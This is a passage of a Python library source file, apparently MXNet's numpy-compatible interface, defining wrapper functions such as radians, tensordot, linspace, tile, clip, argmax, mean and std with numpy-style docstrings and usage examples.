array([ 0., 30., 60., 90., 120., 150., 180., 210., 240., 270., 300., 330.])
>>> out
array([ 0., 30., 60., 90., 120., 150., 180., 210., 240., 270., 300., 330.])
"""
return _mx_nd_np.degrees(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def radians(x, out=None, **kwargs):
"""
Convert angles from degrees to radians.
Parameters
----------
x : ndarray or scalar
Input array in degrees.
out : ndarray or None
A location into which the result is stored.
If provided, it must have the same shape and type as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
y : ndarray
The corresponding radian values. This is a scalar if x is a scalar.
Notes
-----
This function differs from the original `numpy.radians
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.radians.html>`_ in
the following way(s):
    - only ndarray or scalar is accepted as valid input, tuple of ndarray is not supported
- broadcasting to `out` of different shape is currently not supported
- when input is plain python numerics, the result will not be stored in the `out` param
Examples
--------
>>> deg = np.arange(12.) * 30.
>>> np.radians(deg)
array([0. , 0.5235988, 1.0471976, 1.5707964, 2.0943952, 2.6179938,
3.1415927, 3.6651914, 4.1887903, 4.712389 , 5.2359877, 5.7595863],
dtype=float32)
"""
return _mx_nd_np.radians(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def reciprocal(x, out=None, **kwargs):
r"""
reciprocal(x, out=None)
Return the reciprocal of the argument, element-wise.
Calculates ``1/x``.
Parameters
----------
x : ndarray or scalar
The values whose reciprocals are required.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
y : ndarray or scalar
Output array is same shape and type as x. This is a scalar if x is a scalar.
Examples
--------
>>> np.reciprocal(2.)
0.5
>>> x = np.array([1, 2., 3.33])
>>> np.reciprocal(x)
array([1. , 0.5 , 0.3003003])
Notes
-----
.. note::
This function is not designed to work with integers.
For integer arguments with absolute value larger than 1 the result is
always zero because of the way Python handles integer division. For
integer zero the result is an overflow.
The output `ndarray` has the same `ctx` as the input `ndarray`.
This function differs from the original `numpy.reciprocal
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.reciprocal.html>`_ in
the following aspects:
- Only support ndarray and scalar now.
- `where` argument is not supported.
"""
return _mx_nd_np.reciprocal(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def square(x, out=None, **kwargs):
r"""
square(x, out=None)
Return the element-wise square of the input.
Parameters
----------
x : ndarray or scalar
The values whose squares are required.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
y : ndarray or scalar
Output array is same shape and type as x. This is a scalar if x is a scalar.
Examples
--------
>>> np.square(2.)
4.0
>>> x = np.array([1, 2., -1])
>>> np.square(x)
array([1., 4., 1.])
Notes
-----
The output `ndarray` has the same `ctx` as the input `ndarray`.
This function differs from the original `numpy.square
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.square.html>`_ in
the following aspects:
- Only support ndarray and scalar now.
- `where` argument is not supported.
- Complex input is not supported.
"""
return _mx_nd_np.square(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def negative(x, out=None, where=True, **kwargs):
r"""
negative(x, out=None, where=True)
Numerical negative, element-wise.
    Parameters
    ----------
x : ndarray or scalar
Input array.
out : ndarray, None, or tuple of ndarray and None, optional
A location into which the result is stored.
If provided, it must have a shape that the inputs broadcast to.
If not provided or None, a freshly-allocated array is returned.
A tuple (possible only as a keyword argument) must have length
equal to the number of outputs.
where : ndarray, optional
Values of True indicate to calculate the ufunc at that position,
values of False indicate to leave the value in the output alone.
    Returns
    -------
y : ndarray or scalar
Returned array or scalar: y = -x. This is a scalar if x is a scalar.
    Examples
    --------
>>> np.negative(1)
-1
"""
return _mx_nd_np.negative(x, out=out)
@set_module('mxnet.numpy')
def fix(x, out=None):
"""
Round an array of floats element-wise to nearest integer towards zero.
The rounded values are returned as floats.
    Parameters
    ----------
x : ndarray
An array of floats to be rounded
out : ndarray, optional
Output array
    Returns
    -------
    y : ndarray of floats
        The rounded values, with the same shape as `x`. This is a scalar if `x` is a scalar.
    Examples
    --------
>>> np.fix(3.14)
3
"""
return _mx_nd_np.fix(x, out=out)
@set_module('mxnet.numpy')
def tan(x, out=None, where=True, **kwargs):
r"""
tan(x, out=None, where=True)
Compute tangent element-wise.
Equivalent to np.sin(x)/np.cos(x) element-wise.
    Parameters
    ----------
x : ndarray
Input array.
out : ndarray or none, optional
A location into which the result is stored. If provided,
it must have a shape that the inputs broadcast to. If not provided or None,
a freshly-allocated array is returned. A tuple (possible only as a keyword argument)
must have length equal to the number of outputs.
where : ndarray, optional
Values of True indicate to calculate the ufunc at that position,
values of False indicate to leave the value in the output alone.
    Returns
    -------
y : ndarray
The corresponding tangent values. This is a scalar if x is a scalar.
    Examples
    --------
>>> np.tan(0.5)
0.5463024898437905
"""
return _mx_nd_np.tan(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def ceil(x, out=None, **kwargs):
r"""
Return the ceiling of the input, element-wise.
The ceil of the ndarray `x` is the smallest integer `i`, such that
`i >= x`. It is often denoted as :math:`\lceil x \rceil`.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None
A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output and input must be the same.
Returns
-------
y : ndarray or scalar
The ceiling of each element in `x`, with `float` dtype.
This is a scalar if `x` is a scalar.
Examples
--------
>>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
>>> np.ceil(a)
array([-1., -1., -0., 1., 2., 2., 2.])
>>> #if you use parameter out, x and out must be ndarray. if not, you will get an error!
>>> a = np.array(1)
>>> np.ceil(np.array(3.5), a)
array(4.)
>>> a
array(4.)
"""
return _mx_nd_np.ceil(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def floor(x, out=None, **kwargs):
r"""
Return the floor of the input, element-wise.
    The floor of the ndarray `x` is the largest integer `i`, such that
`i <= x`. It is often denoted as :math:`\lfloor x \rfloor`.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None
A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output and input must be the same.
Returns
-------
y : ndarray or scalar
The floor of each element in `x`, with `float` dtype.
This is a scalar if `x` is a scalar.
Examples
--------
>>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
>>> np.floor(a)
array([-2., -2., -1., 0., 1., 1., 2.])
>>> #if you use parameter out, x and out must be ndarray. if not, you will get an error!
>>> a = np.array(1)
>>> np.floor(np.array(3.5), a)
array(3.)
>>> a
array(3.)
"""
return _mx_nd_np.floor(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def trunc(x, out=None, **kwargs):
r"""
trunc(x, out=None)
Return the truncated value of the input, element-wise.
The truncated value of the scalar `x` is the nearest integer `i` which
is closer to zero than `x` is. In short, the fractional part of the
signed number `x` is discarded.
Parameters
----------
x : ndarray or scalar
Input data.
out : ndarray or None, optional
A location into which the result is stored.
Returns
-------
y : ndarray or scalar
The truncated value of each element in `x`.
This is a scalar if `x` is a scalar.
Notes
-----
This function differs from the original numpy.trunc in the following aspects:
- Do not support `where`, a parameter in numpy which indicates where to calculate.
- Cannot cast type automatically. Dtype of `out` must be same as the expected one.
- Cannot broadcast automatically. Shape of `out` must be same as the expected one.
- If `x` is plain python numeric, the result won't be stored in out.
Examples
--------
>>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
>>> np.trunc(a)
array([-1., -1., -0., 0., 1., 1., 2.])
"""
return _mx_nd_np.trunc(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def logical_not(x, out=None, **kwargs):
r"""
logical_not(x, out=None)
Compute the truth value of NOT x element-wise.
Parameters
----------
x : ndarray or scalar
Logical NOT is applied to the elements of `x`.
out : ndarray or None, optional
A location into which the result is stored.
Returns
-------
y : bool or ndarray of bool
Boolean result with the same shape as `x` of the NOT operation
on elements of `x`.
This is a scalar if `x` is a scalar.
Notes
-----
This function differs from the original numpy.logical_not in the following aspects:
- Do not support `where`, a parameter in numpy which indicates where to calculate.
- Cannot cast type automatically. Dtype of `out` must be same as the expected one.
- Cannot broadcast automatically. Shape of `out` must be same as the expected one.
- If `x` is plain python numeric, the result won't be stored in out.
Examples
--------
>>> x= np.array([True, False, 0, 1])
>>> np.logical_not(x)
array([0., 1., 1., 0.])
>>> x = np.arange(5)
>>> np.logical_not(x<3)
array([0., 0., 0., 1., 1.])
"""
return _mx_nd_np.logical_not(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def arcsinh(x, out=None, **kwargs):
r"""
arcsinh(x, out=None)
    Inverse hyperbolic sine, element-wise.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None, optional
A location into which the result is stored.
Returns
-------
arcsinh : ndarray
Array of the same shape as `x`.
This is a scalar if `x` is a scalar.
Notes
-----
`arcsinh` is a multivalued function: for each `x` there are infinitely
many numbers `z` such that `sinh(z) = x`.
For real-valued input data types, `arcsinh` always returns real output.
For each value that cannot be expressed as a real number or infinity, it
yields ``nan`` and sets the `invalid` floating point error flag.
This function differs from the original numpy.arcsinh in the following aspects:
- Do not support `where`, a parameter in numpy which indicates where to calculate.
- Do not support complex-valued input.
- Cannot cast type automatically. DType of `out` must be same as the expected one.
- Cannot broadcast automatically. Shape of `out` must be same as the expected one.
- If `x` is plain python numeric, the result won't be stored in out.
Examples
--------
>>> a = np.array([3.2, 5.0])
>>> np.arcsinh(a)
array([1.8309381, 2.2924316])
    >>> np.arcsinh(0)
    0.0
"""
return _mx_nd_np.arcsinh(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def arccosh(x, out=None, **kwargs):
r"""
arccosh(x, out=None)
Inverse hyperbolic cosine, element-wise.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None, optional
A location into which the result is stored.
Returns
-------
arccosh : ndarray
Array of the same shape as `x`.
This is a scalar if `x` is a scalar.
Notes
-----
`arccosh` is a multivalued function: for each `x` there are infinitely
many numbers `z` such that `cosh(z) = x`.
For real-valued input data types, `arccosh` always returns real output.
For each value that cannot be expressed as a real number or infinity, it
yields ``nan`` and sets the `invalid` floating point error flag.
This function differs from the original numpy.arccosh in the following aspects:
- Do not support `where`, a parameter in numpy which indicates where to calculate.
- Do not support complex-valued input.
- Cannot cast type automatically. Dtype of `out` must be same as the expected one.
- Cannot broadcast automatically. Shape of `out` must be same as the expected one.
- If `x` is plain python numeric, the result won't be stored in out.
Examples
--------
>>> a = np.array([3.2, 5.0])
>>> np.arccosh(a)
array([1.8309381, 2.2924316])
>>> np.arccosh(1)
0.0
"""
return _mx_nd_np.arccosh(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def arctanh(x, out=None, **kwargs):
r"""
arctanh(x, out=None)
Inverse hyperbolic tangent, element-wise.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None, optional
A location into which the result is stored.
Returns
-------
arctanh : ndarray
Array of the same shape as `x`.
This is a scalar if `x` is a scalar.
Notes
-----
`arctanh` is a multivalued function: for each `x` there are infinitely
many numbers `z` such that `tanh(z) = x`.
For real-valued input data types, `arctanh` always returns real output.
For each value that cannot be expressed as a real number or infinity, it
yields ``nan`` and sets the `invalid` floating point error flag.
This function differs from the original numpy.arctanh in the following aspects:
- Do not support `where`, a parameter in numpy which indicates where to calculate.
- Do not support complex-valued input.
- Cannot cast type automatically. Dtype of `out` must be same as the expected one.
- Cannot broadcast automatically. Shape of `out` must be same as the expected one.
- If `x` is plain python numeric, the result won't be stored in out.
Examples
--------
>>> a = np.array([0.0, -0.5])
>>> np.arctanh(a)
array([0., -0.54930615])
    >>> np.arctanh(0)
    0.0
"""
return _mx_nd_np.arctanh(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def tensordot(a, b, axes=2):
r"""
tensordot(a, b, axes=2)
Compute tensor dot product along specified axes for arrays >= 1-D.
Given two tensors (arrays of dimension greater than or equal to one),
`a` and `b`, and an ndarray object containing two ndarray
objects, ``(a_axes, b_axes)``, sum the products of `a`'s and `b`'s
elements (components) over the axes specified by ``a_axes`` and
``b_axes``. The third argument can be a single non-negative
integer_like scalar, ``N``; if it is such, then the last ``N``
dimensions of `a` and the first ``N`` dimensions of `b` are summed
over.
Parameters
----------
a, b : ndarray, len(shape) >= 1
Tensors to "dot".
axes : int or (2,) ndarray
* integer_like
If an int N, sum over the last N axes of `a` and the first N axes
of `b` in order. The sizes of the corresponding axes must match.
* (2,) ndarray
Or, a list of axes to be summed over, first sequence applying to `a`,
second to `b`. Both elements ndarray must be of the same length.
See Also
--------
dot, einsum
Notes
-----
Three common use cases are:
* ``axes = 0`` : tensor product :math:`a\otimes b`
* ``axes = 1`` : tensor dot product :math:`a\cdot b`
* ``axes = 2`` : (default) tensor double contraction :math:`a:b`
When `axes` is integer_like, the sequence for evaluation will be: first
the -Nth axis in `a` and 0th axis in `b`, and the -1th axis in `a` and
Nth axis in `b` last.
When there is more than one axis to sum over - and they are not the last
(first) axes of `a` (`b`) - the argument `axes` should consist of
two sequences of the same length, with the first axis to sum over given
first in both sequences, the second axis second, and so forth.
Examples
--------
>>> a = np.arange(60.).reshape(3,4,5)
>>> b = np.arange(24.).reshape(4,3,2)
>>> c = np.tensordot(a,b, axes=([1,0],[0,1]))
>>> c.shape
(5, 2)
>>> c
array([[ 4400., 4730.],
[ 4532., 4874.],
[ 4664., 5018.],
[ 4796., 5162.],
[ 4928., 5306.]])
"""
return _mx_nd_np.tensordot(a, b, axes)
@set_module('mxnet.numpy')
def linspace(start, stop, num=50, endpoint=True, retstep=False, dtype=None, axis=0, ctx=None): # pylint: disable=too-many-arguments
r"""
Return evenly spaced numbers over a specified interval.
Returns num evenly spaced samples, calculated over the interval [start, stop].
The endpoint of the interval can optionally be excluded.
Parameters
----------
start : real number
The starting value of the sequence.
stop : real number
The end value of the sequence, unless endpoint is set to False. In
that case, the sequence consists of all but the last of num + 1
evenly spaced samples, so that stop is excluded. Note that the step
size changes when endpoint is False.
num : int, optional
Number of samples to generate. Default is 50. Must be non-negative.
endpoint : bool, optional
If True, stop is the last sample. Otherwise, it is not included.
Default is True.
retstep : bool, optional
If True, return (samples, step), where step is the spacing between samples.
dtype : dtype, optional
The type of the output array. If dtype is not given, infer the data
type from the other input arguments.
axis : int, optional
The axis in the result to store the samples. Relevant only if start or
stop are array-like. By default (0), the samples will be along a new
axis inserted at the beginning. Use -1 to get an axis at the end.
Returns
-------
samples : ndarray
There are num equally spaced samples in the closed interval
`[start, stop]` or the half-open interval `[start, stop)`
(depending on whether endpoint is True or False).
step : float, optional
Only returned if retstep is True
Size of spacing between samples.
See Also
--------
arange : Similar to `linspace`, but uses a step size (instead of the
number of samples).
Examples
--------
>>> np.linspace(2.0, 3.0, num=5)
array([2. , 2.25, 2.5 , 2.75, 3. ])
>>> np.linspace(2.0, 3.0, num=5, endpoint=False)
array([2. , 2.2, 2.4, 2.6, 2.8])
>>> np.linspace(2.0, 3.0, num=5, retstep=True)
(array([2. , 2.25, 2.5 , 2.75, 3. ]), 0.25)
Graphical illustration:
>>> import matplotlib.pyplot as plt
>>> N = 8
>>> y = np.zeros(N)
>>> x1 = np.linspace(0, 10, N, endpoint=True)
>>> x2 = np.linspace(0, 10, N, endpoint=False)
>>> plt.plot(x1.asnumpy(), y.asnumpy(), 'o')
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.plot(x2.asnumpy(), (y + 0.5).asnumpy(), 'o')
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.ylim([-0.5, 1])
(-0.5, 1)
>>> plt.show()
Notes
-----
This function differs from the original `numpy.linspace
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.linspace.html>`_ in
the following aspects:
- `start` and `stop` do not support list, numpy ndarray and mxnet ndarray
- axis could only be 0
- There could be an additional `ctx` argument to specify the device, e.g. the i-th
GPU.
"""
return _mx_nd_np.linspace(start, stop, num, endpoint, retstep, dtype, axis, ctx)
@set_module('mxnet.numpy')
def expand_dims(a, axis):
"""Expand the shape of an array.
Insert a new axis that will appear at the `axis` position in the expanded array shape.
Parameters
----------
a : ndarray
Input array.
axis : int
Position in the expanded axes where the new axis is placed.
Returns
-------
res : ndarray
Output array. The number of dimensions is one greater than that of
the input array.
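    Examples
    --------
    A quick shape illustration:
    >>> x = np.array([1., 2.])
    >>> np.expand_dims(x, axis=0).shape
    (1, 2)
    >>> np.expand_dims(x, axis=1).shape
    (2, 1)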
"""
return _npi.expand_dims(a, axis)
@set_module('mxnet.numpy')
def tile(A, reps):
r"""
Construct an array by repeating A the number of times given by reps.
If `reps` has length ``d``, the result will have dimension of
``max(d, A.ndim)``.
If ``A.ndim < d``, `A` is promoted to be d-dimensional by prepending new
axes. So a shape (3,) array is promoted to (1, 3) for 2-D replication,
or shape (1, 1, 3) for 3-D replication. If this is not the desired
behavior, promote `A` to d-dimensions manually before calling this
function.
If ``A.ndim > d``, `reps` is promoted to `A`.ndim by pre-pending 1's to it.
Thus for an `A` of shape (2, 3, 4, 5), a `reps` of (2, 2) is treated as
(1, 1, 2, 2).
Parameters
----------
A : ndarray or scalar
An input array or a scalar to repeat.
reps : a single integer or tuple of integers
The number of repetitions of `A` along each axis.
Returns
-------
c : ndarray
The tiled output array.
Examples
--------
>>> a = np.array([0, 1, 2])
>>> np.tile(a, 2)
array([0., 1., 2., 0., 1., 2.])
>>> np.tile(a, (2, 2))
array([[0., 1., 2., 0., 1., 2.],
[0., 1., 2., 0., 1., 2.]])
>>> np.tile(a, (2, 1, 2))
array([[[0., 1., 2., 0., 1., 2.]],
[[0., 1., 2., 0., 1., 2.]]])
>>> b = np.array([[1, 2], [3, 4]])
>>> np.tile(b, 2)
array([[1., 2., 1., 2.],
[3., 4., 3., 4.]])
    >>> np.tile(b, (2, 1))
array([[1., 2.],
[3., 4.],
[1., 2.],
[3., 4.]])
>>> c = np.array([1,2,3,4])
>>> np.tile(c,(4,1))
array([[1., 2., 3., 4.],
[1., 2., 3., 4.],
[1., 2., 3., 4.],
[1., 2., 3., 4.]])
Scalar as input:
>>> np.tile(2, 3)
array([2, 2, 2]) # repeating integer `2`
"""
return _mx_nd_np.tile(A, reps)
@set_module('mxnet.numpy')
def arange(start, stop=None, step=1, dtype=None, ctx=None):
"""Return evenly spaced values within a given interval.
Values are generated within the half-open interval ``[start, stop)``
(in other words, the interval including `start` but excluding `stop`).
For integer arguments the function is equivalent to the Python built-in
`range` function, but returns an ndarray rather than a list.
Parameters
----------
start : number, optional
Start of interval. The interval includes this value. The default
start value is 0.
stop : number
End of interval. The interval does not include this value, except
in some cases where `step` is not an integer and floating point
round-off affects the length of `out`.
step : number, optional
Spacing between values. For any output `out`, this is the distance
between two adjacent values, ``out[i+1] - out[i]``. The default
step size is 1. If `step` is specified as a position argument,
`start` must also be given.
dtype : dtype
The type of the output array. The default is `float32`.
Returns
-------
arange : ndarray
Array of evenly spaced values.
For floating point arguments, the length of the result is
``ceil((stop - start)/step)``. Because of floating point overflow,
this rule may result in the last element of `out` being greater
than `stop`.
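    Examples
    --------
    A minimal sketch; note the `float32` default dtype of the result:
    >>> np.arange(3)
    array([0., 1., 2.])
    >>> np.arange(1, 7, 2)
    array([1., 3., 5.])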
"""
return _mx_nd_np.arange(start, stop, step, dtype, ctx)
@set_module('mxnet.numpy')
def split(ary, indices_or_sections, axis=0):
"""Split an array into multiple sub-arrays.
Parameters
----------
ary : ndarray
Array to be divided into sub-arrays.
indices_or_sections : int or 1-D array
If `indices_or_sections` is an integer, N, the array will be divided
into N equal arrays along `axis`. If such a split is not possible,
an error is raised.
If `indices_or_sections` is a 1-D array of sorted integers, the entries
indicate where along `axis` the array is split. For example,
``[2, 3]`` would, for ``axis=0``, result in
- ary[:2]
- ary[2:3]
- ary[3:]
If an index exceeds the dimension of the array along `axis`,
an empty sub-array is returned correspondingly.
axis : int, optional
The axis along which to split, default is 0.
Returns
-------
sub-arrays : list of ndarrays
A list of sub-arrays.
Raises
------
ValueError
If `indices_or_sections` is given as an integer, but
a split does not result in equal division."""
return _mx_nd_np.split(ary, indices_or_sections, axis=axis)
@set_module('mxnet.numpy')
def concatenate(seq, axis=0, out=None):
"""Join a sequence of arrays along an existing axis.
Parameters
----------
    seq : sequence of ndarrays
The arrays must have the same shape, except in the dimension
corresponding to `axis` (the first, by default).
axis : int, optional
The axis along which the arrays will be joined. If axis is None,
arrays are flattened before use. Default is 0.
out : ndarray, optional
If provided, the destination to place the result. The shape must be
correct, matching that of what concatenate would have returned if no
out argument were specified.
Returns
-------
res : ndarray
The concatenated array.
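    Examples
    --------
    A small shape-level illustration:
    >>> a = np.ones((2, 3))
    >>> b = np.zeros((1, 3))
    >>> np.concatenate((a, b), axis=0).shape
    (3, 3)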
"""
return _mx_nd_np.concatenate(seq, axis=axis, out=out)
@set_module('mxnet.numpy')
def stack(arrays, axis=0, out=None):
"""Join a sequence of arrays along a new axis.
The axis parameter specifies the index of the new axis in the dimensions of the result.
For example, if `axis=0` it will be the first dimension and if `axis=-1` it will be the last dimension.
Parameters
----------
arrays : sequence of array_like
Each array must have the same shape.
axis : int, optional
The axis in the result array along which the input arrays are stacked.
out : ndarray, optional
If provided, the destination to place the result. The shape must be correct,
matching that of what stack would have returned if no out argument were specified.
Returns
-------
stacked : ndarray
The stacked array has one more dimension than the input arrays."""
return _mx_nd_np.stack(arrays, axis=axis, out=out)
@set_module('mxnet.numpy')
def maximum(x1, x2, out=None):
"""Returns element-wise maximum of the input arrays with broadcasting.
Parameters
----------
x1, x2 : scalar or mxnet.numpy.ndarray
The arrays holding the elements to be compared. They must have the same shape,
or shapes that can be broadcast to a single shape.
Returns
-------
out : mxnet.numpy.ndarray or scalar
The maximum of x1 and x2, element-wise. This is a scalar if both x1 and x2 are scalars."""
return _mx_nd_np.maximum(x1, x2, out=out)
@set_module('mxnet.numpy')
def minimum(x1, x2, out=None):
"""Returns element-wise minimum of the input arrays with broadcasting.
Parameters
----------
x1, x2 : scalar or mxnet.numpy.ndarray
The arrays holding the elements to be compared. They must have the same shape,
or shapes that can be broadcast to a single shape.
Returns
-------
out : mxnet.numpy.ndarray or scalar
The minimum of x1 and x2, element-wise. This is a scalar if both x1 and x2 are scalars."""
return _mx_nd_np.minimum(x1, x2, out=out)
@set_module('mxnet.numpy')
def swapaxes(a, axis1, axis2):
"""Interchange two axes of an array.
Parameters
----------
a : ndarray
Input array.
axis1 : int
First axis.
axis2 : int
Second axis.
Returns
-------
a_swapped : ndarray
Swapped array. This is always a copy of the input array.
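    Examples
    --------
    A quick shape illustration:
    >>> x = np.zeros((2, 3, 4))
    >>> np.swapaxes(x, 0, 2).shape
    (4, 3, 2)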
"""
return _npi.swapaxes(a, dim1=axis1, dim2=axis2)
@set_module('mxnet.numpy')
def clip(a, a_min, a_max, out=None):
"""clip(a, a_min, a_max, out=None)
Clip (limit) the values in an array.
Given an interval, values outside the interval are clipped to
the interval edges. For example, if an interval of ``[0, 1]``
is specified, values smaller than 0 become 0, and values larger
than 1 become 1.
Parameters
----------
a : ndarray
Array containing elements to clip.
a_min : scalar or `None`
Minimum value. If `None`, clipping is not performed on lower
interval edge. Not more than one of `a_min` and `a_max` may be
`None`.
a_max : scalar or `None`
Maximum value. If `None`, clipping is not performed on upper
interval edge. Not more than one of `a_min` and `a_max` may be
`None`.
out : ndarray, optional
The results will be placed in this array. It may be the input
array for in-place clipping. `out` must be of the right shape
to hold the output. Its type is preserved.
Returns
-------
clipped_array : ndarray
An array with the elements of `a`, but where values
< `a_min` are replaced with `a_min`, and those > `a_max`
with `a_max`.
Notes
-----
array_like `a_min` and `a_max` are not supported.
Examples
--------
>>> a = np.arange(10)
>>> np.clip(a, 1, 8)
array([1., 1., 2., 3., 4., 5., 6., 7., 8., 8.], dtype=float32)
>>> a
array([0., 1., 2., 3., 4., 5., 6., 7., 8., 9.], dtype=float32)
>>> np.clip(a, 3, 6, out=a)
array([3., 3., 3., 3., 4., 5., 6., 6., 6., 6.], dtype=float32)
"""
return _mx_nd_np.clip(a, a_min, a_max, out=out)
@set_module('mxnet.numpy')
def argmax(a, axis=None, out=None):
r"""
argmax(a, axis=None, out=None)
Returns the indices of the maximum values along an axis.
Parameters
----------
a : ndarray
Input array. Only support ndarrays of dtype `float16`, `float32`, and `float64`.
axis : int, optional
By default, the index is into the flattened array, otherwise
along the specified axis.
out : ndarray or None, optional
If provided, the result will be inserted into this array. It should
be of the appropriate shape and dtype.
Returns
-------
index_array : ndarray of indices whose dtype is same as the input ndarray.
Array of indices into the array. It has the same shape as `a.shape`
with the dimension along `axis` removed.
Notes
-----
In case of multiple occurrences of the maximum values, the indices
corresponding to the first occurrence are returned.
This function differs from the original `numpy.argmax
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.argmax.html>`_ in
the following aspects:
- Input type does not support Python native iterables(list, tuple, ...).
- Output has dtype that is same as the input ndarray.
- ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
- ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
- ``out`` param does not support scalar input case.
Examples
--------
>>> a = np.arange(6).reshape(2,3) + 10
>>> a
array([[10., 11., 12.],
[13., 14., 15.]])
>>> np.argmax(a)
array(5.)
>>> np.argmax(a, axis=0)
array([1., 1., 1.])
>>> np.argmax(a, axis=1)
array([2., 2.])
>>> b = np.arange(6)
>>> b[1] = 5
>>> b
array([0., 5., 2., 3., 4., 5.])
>>> np.argmax(b) # Only the first occurrence is returned.
array(1.)
Specify ``out`` ndarray:
>>> a = np.arange(6).reshape(2,3) + 10
>>> b = np.zeros((2,))
>>> np.argmax(a, axis=1, out=b)
array([2., 2.])
>>> b
array([2., 2.])
"""
return _mx_nd_np.argmax(a, axis, out)
@set_module('mxnet.numpy')
def mean(a, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ
"""
    mean(a, axis=None, dtype=None, out=None, keepdims=False)
Compute the arithmetic mean along the specified axis.
Returns the average of the array elements.
The average is taken over the flattened array by default, otherwise over the specified axis.
Parameters
----------
a : ndarray
ndarray containing numbers whose mean is desired.
axis : None or int or tuple of ints, optional
Axis or axes along which the means are computed. The default is to compute the mean of the flattened array.
If this is a tuple of ints, a mean is performed over multiple axes,
instead of a single axis or all the axes as before.
dtype : data-type, optional
Type to use in computing the mean. For integer inputs, the default is float32;
for floating point inputs, it is the same as the input dtype.
out : ndarray, optional
Alternate output array in which to place the result. The default is None; if provided,
it must have the same shape and type as the expected output.
keepdims : bool, optional
If this is set to True, the axes which are reduced are left in the result
as dimensions with size one. With this option, the result will broadcast correctly
against the input array.
If the default value is passed, then keepdims will not be passed through to the mean
method of sub-classes of ndarray, however any non-default value will be. If the sub-class
method does not implement keepdims any exceptions will be raised.
Returns
-------
m : ndarray, see dtype parameter above
If out=None, returns a new array containing the mean values,
otherwise a reference to the output array is returned.
Notes
-----
This function differs from the original `numpy.mean
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.mean.html>`_ in
the following way(s):
    - only ndarray is accepted as valid input; python iterables or scalars are not supported
- default data type for integer input is float32
Examples
--------
>>> a = np.array([[1, 2], [3, 4]])
>>> np.mean(a)
array(2.5)
>>> a = np.zeros((2, 512*512), dtype=np.float32)
>>> a[0,:] = 1.0
>>> a[1,:] = 0.1
>>> np.mean(a)
array(0.55)
>>> np.mean(a, dtype=np.float64)
array(0.55)
"""
return _npi.mean(a, axis=axis, dtype=dtype, keepdims=keepdims, out=out)
@set_module('mxnet.numpy')
def std(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):
"""
Compute the standard deviation along the specified axis.
Returns the standard deviation, a measure of the spread of a distribution,
of the array elements. The standard deviation is computed for the
flattened array by default, otherwise over the specified axis.
Parameters
----------
a : array_like
Calculate the standard deviation of these values.
axis : None or int or tuple of ints, optional
Axis or axes along which the standard deviation is computed. The
default is to compute the standard deviation of the flattened array.
.. versionadded:: 1.7.0
If this is a tuple of ints, a standard deviation is performed over
multiple axes, instead of a single axis or all the axes as before.
dtype : dtype, optional
Type to use in computing the standard deviation. For arrays of
integer type the default is float64, for arrays of float types it is
the same as the array type.
out : ndarray, optional
Alternative output array in which to place the result. It must have
the same shape as the expected output but the type (of the calculated
values) will be cast if necessary.
ddof : int, optional
Means Delta Degrees of Freedom. The divisor used in calculations
is ``N - ddof``, where ``N`` represents the number of elements.
By default `ddof` is zero.
keepdims : bool, optional
If this is set to True, the axes which are reduced are left
in the result as dimensions with size one. With this option,
the result will broadcast correctly against the input array.
If the default value is passed, then `keepdims` will not be
passed through to the `std` method of sub-classes of
`ndarray`, however any non-default value will be. If the
sub-class' method does not implement `keepdims` any
exceptions will be raised.
Returns
-------
standard_deviation : ndarray, see dtype parameter above.
If `out` is None, return a new array containing the standard deviation,
otherwise return a reference to the output array.
Examples
--------
>>> a = np.array([[1, 2], [3, 4]])
>>> np.std(a)
1.1180339887498949 # may vary
>>> np.std(a, axis=0)
array([1., 1.])
>>> np.std(a, axis=1)
array([0.5, 0.5])
In single precision, std() can be inaccurate:
>>> a = np.zeros((2, 512*512), dtype=np.float32)
>>> a[0, :] = 1.0
>>> a[1, :] = 0.1
>>> np.std(a)
array(0.45)
>>> np.std(a, dtype=np.float64)
array(0.45, dtype=float64)
"""
return _npi.std(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)
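# Worked illustration of the ddof behaviour documented above: with the default
# ddof=0 the divisor is N (population statistics), so for [[1, 2], [3, 4]]
# var = 5/4 = 1.25 and std = sqrt(1.25) ~= 1.118; passing ddof=1 would divide
# by N - 1 = 3 instead.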
@set_module('mxnet.numpy')
